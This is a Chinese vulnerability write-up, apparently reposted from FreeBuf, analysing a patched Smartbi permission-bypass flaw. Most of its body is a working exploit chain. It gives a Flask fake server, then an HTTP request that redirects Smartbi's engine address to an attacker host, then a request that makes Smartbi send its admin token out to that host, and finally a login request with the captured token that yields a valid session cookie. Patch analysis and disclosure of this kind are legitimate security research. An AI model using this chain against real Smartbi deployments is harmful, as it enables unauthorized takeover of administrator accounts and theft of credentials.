关闭

smartbi token回调获取登录凭证漏洞

发表于:2023-8-28 09:17

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:佚名    来源:FreeBuf

  2023年7月28日Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。 于是研究了下相关补丁并进行分析。
  0x01分析结果
  依据补丁分析,得到如下漏洞复现步骤
  第一步,设置EngineAddress为攻击者机器上的http服务地址
  首先使用python flask搭建一个fake server,上面只注册了/api/v1/configs/engine/smartbitoken接口,该接口返回一个json响应体。
  from flask import Flask,jsonify,request

  app = Flask(__name__)

  @app.route('/api/v1/configs/engine/smartbitoken',methods=["POST"])
  def hello():
  print(request.json)
  return jsonify(hi="jello")

  if __name__ == "__main__":
  app.run(host="0.0.0.0",port=8000)
  使用如下poc,设置EngineAddress为我们的fake server地址http://10.52.32.43:8000,
  POST /smartbi/smartbix/api/monitor/setEngineAddress/ HTTP/1.1
  Host: 127.0.0.1:18080
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  Connection: close
  Content-Length: 23
  
  http://10.52.32.43:8000
  第二步,触发smartbi向我们刚刚设置的EngineAddress外发token
  发送如下请求:
  POST /smartbi//smartbix/api/monitor/token/ HTTP/1.1
  Host: 127.0.0.1:18080
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  Connection: close
  Content-Length: 10
  
  experiment
  发送相关请求后,即可在我们的fake server上面看到了携带token的请求。
  第三步,使用上面获取的token进行登录
  POST /smartbi//smartbix/api/monitor/login/ HTTP/1.1
  Host: 127.0.0.1:18080
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  Connection: close
  Content-Length: 47
  
  admin_I8ac3b2d10189e80fe80fea750189ed0084f50082
  返回true表示登录成功,其中的cookie就是合法的凭证。
  本文内容不用于商业目的,如涉及知识产权问题,请权利人联系51Testing小编(021-64471599-8017),我们将立即处理
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号